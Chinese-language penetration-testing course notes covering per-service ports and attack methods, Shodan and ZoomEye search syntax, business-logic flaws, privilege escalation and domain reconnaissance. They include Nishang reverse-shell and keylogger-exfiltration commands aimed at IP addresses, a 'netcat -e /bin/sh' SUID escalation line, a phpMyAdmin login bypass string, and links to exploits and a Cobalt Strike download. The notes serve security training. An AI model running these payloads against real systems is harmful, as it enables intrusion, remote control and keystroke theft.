Shift粘滯鍵后門(mén)：5次shift后門(mén)
3389漏洞攻擊：利用ms12-020攻擊3389端口，導(dǎo)致服務(wù)器關(guān)機(jī)

VNC服務(wù):一款優(yōu)秀的遠(yuǎn)控工具，常用語(yǔ)類(lèi)UNIX系統(tǒng)上，簡(jiǎn)單功能強(qiáng)大；也
默認(rèn)端口：5900+桌面ID（5901；5902）
攻擊方式：
爆破：弱口令
認(rèn)證口令繞過(guò)：
拒絕服務(wù)攻擊：（CVE-2015-5239）
權(quán)限提升：（CVE-2013-6886）

Web應(yīng)用服務(wù)端口滲透

1.中間價(jià)平臺(tái)滲透
IIS Apache Nginx Weblogic tomcat Jboos Websphere等
可使用vulhub靶場(chǎng)測(cè)試 中間件漏洞集合PDF 未授權(quán)訪(fǎng)問(wèn)集合PDF
2.WEB應(yīng)用程序滲透
已知CMS 未知CMS 常規(guī)漏洞測(cè)試

數(shù)據(jù)庫(kù)服務(wù)端口滲透

針對(duì)所有的 數(shù)據(jù)庫(kù)攻擊方式都存在SQL注入，這里先提出來(lái)在下面就不一一寫(xiě)了免得大家說(shuō)我占篇幅；當(dāng)然不同的數(shù)據(jù)庫(kù)注入技巧可能不一樣，特別是NoSQL與傳統(tǒng)的SQL數(shù)據(jù)庫(kù)不太一樣。但是這不是本文需要介紹的重點(diǎn)，后面有時(shí)間會(huì)寫(xiě)一篇不同數(shù)據(jù)庫(kù)的滲透技巧。

MySQL數(shù)據(jù)庫(kù)
默認(rèn)端口：3306
攻擊方式：
爆破：弱口令
身份認(rèn)證漏洞：CVE-2012-2122
拒絕服務(wù)攻擊：利用sql語(yǔ)句是服務(wù)器進(jìn)行死循環(huán)打死服務(wù)器
Phpmyadmin萬(wàn)能密碼繞過(guò)：用戶(hù)名：‘localhost’@’@” 密碼任意

MSSQL數(shù)據(jù)庫(kù)
默認(rèn)端口：1433（Server 數(shù)據(jù)庫(kù)服務(wù)）、1434（Monitor 數(shù)據(jù)庫(kù)監(jiān)控）
攻擊方式：
爆破：弱口令

Oracle數(shù)據(jù)庫(kù)
默認(rèn)端口：1521（數(shù)據(jù)庫(kù)端口）、1158（Oracle EMCTL端口）、8080（Oracle XDB數(shù)據(jù)庫(kù)）、210（Oracle XDB FTP服務(wù)）
攻擊方式：
爆破：弱口令 漏洞攻擊

PostgreSQL數(shù)據(jù)庫(kù)
PostgreSQL是一種特性非常齊全的自由軟件的對(duì)象–關(guān)系型數(shù)據(jù)庫(kù)管理系統(tǒng)，可以說(shuō)是目前世界上最先進(jìn)，功能最強(qiáng)大的自由數(shù)據(jù)庫(kù)管理系統(tǒng)。包括我們kali系統(tǒng)中msf也使用這個(gè)數(shù)據(jù)庫(kù)；淺談postgresql數(shù)據(jù)庫(kù)攻擊技術(shù) 大部分關(guān)于它的攻擊依舊是sql注入，所以注入才是數(shù)據(jù)庫(kù)不變的話(huà)題。
默認(rèn)端口：5432
攻擊方式：
爆破弱口令：postgres postgres
緩沖區(qū)溢出：CVE-2014-2669

MongoDB數(shù)據(jù)庫(kù)
MongoDB：NoSQL數(shù)據(jù)庫(kù)；攻擊方法與其他數(shù)據(jù)庫(kù)類(lèi)似；關(guān)于它的安全講解：請(qǐng)參考
默認(rèn)端口：27017
攻擊方式：爆破弱口令 未授權(quán)訪(fǎng)問(wèn)

Redis數(shù)據(jù)庫(kù)
redis：是一個(gè)開(kāi)源的使用c語(yǔ)言寫(xiě)的，支持網(wǎng)絡(luò)、可基于內(nèi)存亦可持久化的日志型、key-value數(shù)據(jù)庫(kù)。關(guān)于這個(gè)數(shù)據(jù)庫(kù)這兩年還是很火的，暴露出來(lái)的問(wèn)題也很多。特別是前段時(shí)間暴露的未授權(quán)訪(fǎng)問(wèn)。Exp：https://yunpan.cn/cYjzHxawFpyVt 訪(fǎng)問(wèn)密碼 e547
默認(rèn)端口：6379
攻擊方式：爆破弱口令 未授權(quán)訪(fǎng)問(wèn)+配合ssh key提權(quán)；

SysBase數(shù)據(jù)庫(kù)
默認(rèn)端口：服務(wù)端口5000；監(jiān)聽(tīng)端口4100；備份端口：4200
攻擊方式：
爆破：弱口令 命令注入

DB2數(shù)據(jù)庫(kù)
默認(rèn)端口：5000
攻擊方式：
安全限制繞過(guò)：成功后可執(zhí)行未授權(quán)操作（CVE-2015-1922）

總結(jié)一下：對(duì)于數(shù)據(jù)庫(kù)，我們得知端口很多時(shí)候可以幫助我們?nèi)B透，比如得知mysql的 數(shù)據(jù)庫(kù)，我們就可以使用SQL注入進(jìn)行mof、udf等方式提權(quán)；如果是mssql我們就可以使用xp_cmdshell來(lái)進(jìn)行提權(quán)；如果是其它的數(shù)據(jù) 庫(kù)，我們也可以采用對(duì)應(yīng)的方式；比如各大數(shù)據(jù)庫(kù)對(duì)應(yīng)它們的默認(rèn)口令，版本對(duì)應(yīng)的漏洞！

郵件服務(wù)端口滲透

SMTP協(xié)議
smtp：郵件協(xié)議，在linux中默認(rèn)開(kāi)啟這個(gè)服務(wù)，可以向?qū)Ψ桨l(fā)送釣魚(yú)郵件！
默認(rèn)端口：25（smtp）、465（smtps）
攻擊方式：
爆破：弱口令 未授權(quán)訪(fǎng)問(wèn)

POP3協(xié)議
默認(rèn)端口：109（POP2）、110（POP3）、995（POP3S）
攻擊方式：爆破弱口令未授權(quán)訪(fǎng)問(wèn)

IMAP協(xié)議
默認(rèn)端口：143（imap）、993（imaps）
攻擊方式：
爆破：弱口令 配置不當(dāng)

網(wǎng)絡(luò)常見(jiàn)協(xié)議端口滲透

DNS服務(wù)
默認(rèn)端口：53
攻擊方式：區(qū)域傳輸漏洞

DHCP服務(wù)
默認(rèn)端口：67&68、546（DHCP Failover做雙機(jī)熱備的）
攻擊方式：DHCP劫持

SNMP協(xié)議
默認(rèn)端口：161
攻擊方式:爆破弱口令

Powershell框架使用 nishang

參考文章：https://www.4hou.com/technology/5962.html

下載地址:

https://github.com/samratashok/nishang

安裝問(wèn)題

nishang的使用是要在PowerShell3.0以上的環(huán)境中才可以正常使用。也就是說(shuō)win7下是有點(diǎn)小問(wèn)題的。win7下自帶的環(huán)境是PowerShell 2.0

功能介紹：

[圖片上傳失敗...(image-a07a8b-1595412502649)]

演示：端口掃描 密碼獲取 鍵盤(pán)記錄 反彈會(huì)話(huà) 口令爆破

實(shí)戰(zhàn)應(yīng)用：
后續(xù)控制
域滲透
系統(tǒng)提權(quán)

反向鏈接：

NC下執(zhí)行 : nc -lvp 3333

在PowerShell下執(zhí)行：Invoke-PowerShellTcp -Reverse -IPAddress 192.168.0.103 -Port 3333

正向鏈接:

PowerShell下執(zhí)行:Invoke-PowerShellTcp -Bind -Port 3333

NC下執(zhí)行:nc -nv 192.168.0.103 3333

測(cè)試鍵盤(pán)記錄:
.\gather\Keylogger.ps1 -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -MagicString stopthis -exfil -ExfilOption WebServer -URL http://192.168.254.226/data/catch.php //將記錄指定發(fā)送給一個(gè)可以記錄Post請(qǐng)求的Web服務(wù)器

解析：Parse_Keys .\key.log .\parsed.txt

域滲透

疑難雜癥

1.真實(shí)案例分析

無(wú)信息

無(wú)漏洞

無(wú)思路

2.各種安全限制

無(wú)解析

無(wú)權(quán)限

無(wú)執(zhí)行

PHP.INI與WEB安全

magic_quotes_gpc
魔術(shù)引號(hào)： 過(guò)濾轉(zhuǎn)義四種字符，對(duì)于sql注入有過(guò)濾作用
寬字節(jié)注入 可以參考注入篇視頻

safe_mod
安全模式：禁止php中敏感函數(shù)，防御提權(quán)及后門(mén)調(diào)用，漏洞利用

open_basedir
限制后門(mén)的訪(fǎng)問(wèn)目錄

disable_function
可自定義禁用函數(shù)：安全模式升級(jí)版，可自定義函數(shù)禁用
dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,putenv,ini_set,apache_setenv,symlink,link
參考
disable_function的突破

https://www.cnblogs.com/linuxsec/articles/10966675.html

工具：蟻劍及插件使用

腳本集合：
https://github.com/l3m0n/Bypass_Disable_functions_Shell
http://webshell8.com/down/phpwebshell.zip

php7.x:（不支持windows）
https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php

相關(guān)安全設(shè)置

目錄解析 執(zhí)行權(quán)限：
防腳本后門(mén)解析，防調(diào)用命令執(zhí)行等

各種安全策略設(shè)置：
IP策略(協(xié)議，腳本) 登錄驗(yàn)證等

日志分析小技術(shù)：
WEB日志，系統(tǒng)日志，數(shù)據(jù)庫(kù)日志等

業(yè)務(wù)安全實(shí)戰(zhàn)指南

1.登錄認(rèn)證模塊
登錄暴力破解
Cookie安全
演示環(huán)境：60cms http://down.chinaz.com/soft/23548.htm
Session安全
演示環(huán)境：https://github.com/adamdoupe/WackoPicko
用戶(hù)憑據(jù)信息
cookie存儲(chǔ)本地端 存活時(shí)間長(zhǎng)
session存儲(chǔ)服務(wù)端 存活時(shí)間可長(zhǎng)可短 一般短

http https

2.業(yè)務(wù)辦理模塊
手機(jī)號(hào)篡改
編號(hào)ID篡改
用戶(hù)ID篡改
商品ID篡改
競(jìng)爭(zhēng)條件

3.授權(quán)訪(fǎng)問(wèn)模塊
水平越權(quán)
yxcms http://www.aspku.com/php/27344.html
infor
垂直越權(quán)
pikachu https://github.com/zhuifengshaonianhanlu/pikachu
以pikachu普通用戶(hù)操作admin管理用戶(hù)權(quán)限
借助session信息提交添加用戶(hù)數(shù)據(jù)包
一.測(cè)試越權(quán)一般得有倆號(hào)。
二.對(duì)userid。orderid等等ID要敏感，一旦發(fā)現(xiàn)，就多測(cè)測(cè)。
三.某些廠(chǎng)商喜歡用純數(shù)字的MD5作為用戶(hù)的cookie，多注意發(fā)現(xiàn)。
四.多使用抓包工具，多分析數(shù)據(jù)包，多修改數(shù)據(jù)包。
五.多站在開(kāi)發(fā)的角度去分析網(wǎng)站哪兒存在越權(quán)。
六.多看看別人的漏洞（某云小川的越權(quán)就講的很到位）

4.輸入輸出模塊
sql注入
xss跨站

5.驗(yàn)證碼機(jī)制模塊
驗(yàn)證碼枚舉
驗(yàn)證碼回顯

6.業(yè)務(wù)數(shù)據(jù)安全模塊
支付金額篡改
訂購(gòu)數(shù)量篡改
HTTP請(qǐng)求重放

7.密碼邏輯找回模塊
驗(yàn)證碼安全
token缺陷
URL跳過(guò)

8.業(yè)務(wù)接口調(diào)用模塊

其他漏洞補(bǔ)充

文件下載漏洞
pikachu 演示
案例測(cè)試：
變異案例：
目錄遍歷漏洞
pikachu 演示
案例測(cè)試：ewebeditor編輯器測(cè)試
反序列化漏洞
參考：https://www.cnblogs.com/xiaoqiyue/p/10951836.html
拓展利用：JBOOS等

代碼執(zhí)行 thinkphp

命令執(zhí)行 st2框架

文件包含 phpmyadmin

業(yè)務(wù)邏輯 上述

變量覆蓋 dedecms

黑暗搜索

shodan

1.簡(jiǎn)單介紹

Shodan，是一個(gè)暗黑系的谷歌，作為一個(gè)針對(duì)網(wǎng)絡(luò)設(shè)備的搜索引擎，它可以在極短的時(shí)間內(nèi)在全球設(shè)備中搜索到你想找的設(shè)備信息。對(duì)于滲透工作者來(lái)說(shuō)，就是一個(gè)輔助我們尋找靶機(jī)的好助手。

2.內(nèi)置語(yǔ)法

Shodan的參數(shù)有很多，這里只介紹簡(jiǎn)單的幾種
hostname："主機(jī)或域名"
如 hostname:"google''

port："端口或服務(wù)"
如 port:"21"

ip : "ip地址"
如 ip : "168.205.71.64"

net："IP地址或子網(wǎng)"

如 net:"210.45.240.0/24"

vuln :指定漏洞的cve

如 vuln:CVE-2015-8869

但是這個(gè)命令最好搭配起來(lái)使用，如 country:CN vuln:CVE-2014-0160

os :"操作系統(tǒng)"

? 如 os:"centOS"

isp："ISP供應(yīng)商"

如 isp:"China Telecom"

product："操作系統(tǒng)/軟件/平臺(tái)"

如 product:"Apache httpd"

version："軟件版本"

如 version:"3.1.6"

geo："經(jīng)緯度"

如 geo:"39.8779,116.4550"

country`："國(guó)家"

如 country:"China"
country:"UN"

city："城市"
如 city:"Hefei"

org："組織或公司"
如 org:"google"

before/after："日/月/年"
如 before:"25/09/2017"
after:"25/09/2017"

asn : "自治系統(tǒng)號(hào)碼"
如 asn:"AS2233"

3.腳本使用

項(xiàng)目地址：https://github.com/achillean/shodan-python

拓展：自主開(kāi)發(fā)

官方文檔：https://shodan.readthedocs.io/en/latest/index.html

案例測(cè)試：
1.phpstudy采集
2.子域名信息采集
3.特定漏洞靶機(jī)采集

zoomeye

內(nèi)置語(yǔ)法
ZoomEye搜索技巧
指定搜索的組件以及版本
app：組件名稱(chēng)
ver：組件版本
例如：搜索 apache組件 版本2.4
app:apache ver:2.4

指定搜索的端口
port:端口號(hào)
例如：搜索開(kāi)放了SSH端口的主機(jī)
port:22
一些服務(wù)器可能監(jiān)聽(tīng)了非標(biāo)準(zhǔn)的端口。
要按照更精確的協(xié)議進(jìn)行檢索，可以使用service進(jìn)行過(guò)濾。

指定搜索的操作系統(tǒng)
OS:操作系統(tǒng)名稱(chēng)
例如：搜索Linux操作系統(tǒng)
OS：Linux

指定搜索的服務(wù)
service：服務(wù)名稱(chēng)
例如，搜素SSH服務(wù)
Service：SSH

指定搜索的地理位置范
country：國(guó)家
city：城市名
例如：
country:China
city：Beijing

搜索指定的CIDR網(wǎng)段
CIDR:網(wǎng)段區(qū)域
例如：
CIDR：192.168.158.12/24

搜索指定的網(wǎng)站域名
Site:網(wǎng)站域名
例如：
site:www.baidu.com

搜索指定的主機(jī)名
Hostname:主機(jī)名
例如：
hostname:zwl.cuit.edu.cn

搜索指定的設(shè)備名
Device：設(shè)備名
例如：
device:router

搜索具有特定首頁(yè)關(guān)鍵詞的主機(jī)
Keyword：關(guān)鍵詞
例如：
keyword:technology

腳本開(kāi)發(fā)

官方手冊(cè):https://www.zoomeye.org/doc

補(bǔ)充：谷歌黑客高級(jí)玩法

https://www.uedbox.com/shdb/
https://www.uedbox.com/post/54776/

補(bǔ)充：其他漏洞

CSRF 跨站請(qǐng)求偽造 簡(jiǎn)單講解
    參考：https://www.cnblogs.com/phpstudy2015-6/p/6771239.html
SSRF 前面已講
XXE  xml實(shí)體注入
    1.本地簡(jiǎn)易代碼演示
    參考：https://uknowsec.cn/posts/notes/XML實(shí)體注入漏洞的利用與學(xué)習(xí).html
    2.實(shí)例：Zblog xxe 任意文件讀取
    下載：https://bbs.zblogcn.com/thread-88670.html

系統(tǒng)提權(quán)補(bǔ)充

自動(dòng)檢測(cè)：

項(xiàng)目地址：
    https://github.com/GDSSecurity/Windows-Exploit-Suggester
    https://github.com/jondonas/linux-exploit-suggester-2
安裝:
    1.python windows-exploit-suggester.py --update （python2）
    2.pip install xlrd --upgrade 安裝插件庫(kù)
    3.python windows-exploit-suggester.py --database 2019-xx.xls --systeminfo xx.txt
    
案例1：Windows 2008/7     test
案例2：Linux-DC-1 vunlhub test 
    https://www.vulnhub.com/entry/dc-1-1,292/
    http://www.itdecent.cn/p/0c22c450f971
    find suidtest -exec netcat -e /bin/sh  192.168.x.x 1234 \;

Windows集合歸類(lèi):
https://github.com/SecWiki/windows-kernel-exploits

linux集合歸類(lèi):
https://github.com/SecWiki/linux-kernel-exploits

本地聯(lián)網(wǎng)漏掃：Vulmap https://github.com/vulmon/Vulmap/

CDN技術(shù)集錦

1.什么是CDN，它有哪些影響？
2.如何檢測(cè)目標(biāo)是否存在CDN？
    超級(jí)ping，nslookup
3.常見(jiàn)CDN繞過(guò)獲取真實(shí)IP方法？
    子域名查詢(xún)
    國(guó)外地址請(qǐng)求
    郵件服務(wù)查詢(xún)
    其他方法：遺留文件，掃全網(wǎng)，黑暗引擎，dns歷史記錄，以量打量
    https://www.lstazl.com/cdn檢測(cè)與繞過(guò)/
    https://www.fujieace.com/penetration-test/cdn-find-ip.html

案例1：對(duì)比有CDN及無(wú)CDN的區(qū)別

案例2：CDN目標(biāo)真實(shí)IP探針演示

    1.www.sp910.com 子域名及get-site-ip獲取 
    2.www.xuexila.com 國(guó)外地址請(qǐng)求
    3.www.kuk8.com   ssl證書(shū)查詢(xún)
    4.www.ldfaka.com 郵件測(cè)試

案例3：CDN相關(guān)腳本工具使用介紹

    https://github.com/boy-hack/w8fuckcdn
    https://github.com/Tai7sy/fuckcdn

重整旗鼓

信息收集匯總篇
    WEB
    信息收集：子域名、開(kāi)放端口、端口指紋、c段地址、敏感目錄、鏈接爬取等信息進(jìn)行批量搜集
    常用工具：layer,subdomainbrute,nmap,masscan,7kbscan,dirbuster,whatweb,bugscaner等 
    相關(guān)工具一體化工具推薦：fuzzscanner

    APP或程序
    提前進(jìn)行反編譯或抓包
    1.簡(jiǎn)易APP抓包
    2.簡(jiǎn)易APP反編譯
    3.簡(jiǎn)易執(zhí)行文件抓包
    將測(cè)試中的相關(guān)URL與WEB相結(jié)合進(jìn)行上一步信息收集

內(nèi)網(wǎng)安全

域環(huán)境下載
鏈接：https://pan.baidu.com/s/1j7OgZ3pOnSNxBCHbnUZ4SQ
提取碼：z7m8

xiaodi8.com 域控服務(wù)器

www.xiaodi8.com ==> 服務(wù)器 ==> IP地址
bbs.xiaodi8.com ==> 服務(wù)器 ==> IP地址
news.xiaodi8.com ==> 服務(wù)器 ==> IP地址
mail.xiaodi8.com ==> 服務(wù)器 ==> IP地址

內(nèi)網(wǎng)測(cè)試

測(cè)試環(huán)境：http://vulnstack.qiyuanxuetang.net/vuln/

測(cè)試步驟：

1.掃描獲取目標(biāo)端口信息
2.利用phpmyadmin獲取shell或web應(yīng)用獲取shell
3.提權(quán)進(jìn)行信息收集獲取域相關(guān)信息
4.利用口令傳遞憑據(jù)測(cè)試域成員
5.利用內(nèi)容krb哈希測(cè)試獲取域控權(quán)限

Cobaltstrike下載鏈接:
https://pan.baidu.com/s/1oJPRfh6-2oOUUKJAF0I2_A 提取碼：3drd
參考視頻：https://www.bilibili.com/video/av45380497?p=18

補(bǔ)充命令：

ipconfig /all    查詢(xún)本機(jī)IP段，所在域等
net config Workstation    當(dāng)前計(jì)算機(jī)名，全名，用戶(hù)名，系統(tǒng)版本，工作站域，登陸域
net user    本機(jī)用戶(hù)列表
net localhroup administrators    本機(jī)管理員[通常含有域用戶(hù)]
net user /domain    查詢(xún)域用戶(hù)
net user 用戶(hù)名 /domain    獲取指定用戶(hù)的賬戶(hù)信息
net user /domain b404 pass    修改域內(nèi)用戶(hù)密碼，需要管理員權(quán)限
net group /domain    查詢(xún)域里面的工作組
net group 組名 /domain    查詢(xún)域中的某工作組
net group "domain admins" /domain    查詢(xún)域管理員列表
net group "domain controllers" /domain    查看域控制器(如果有多臺(tái))
net time /domain    判斷主域，主域服務(wù)器都做時(shí)間服務(wù)器
ipconfig /all    查詢(xún)本機(jī)IP段，所在域等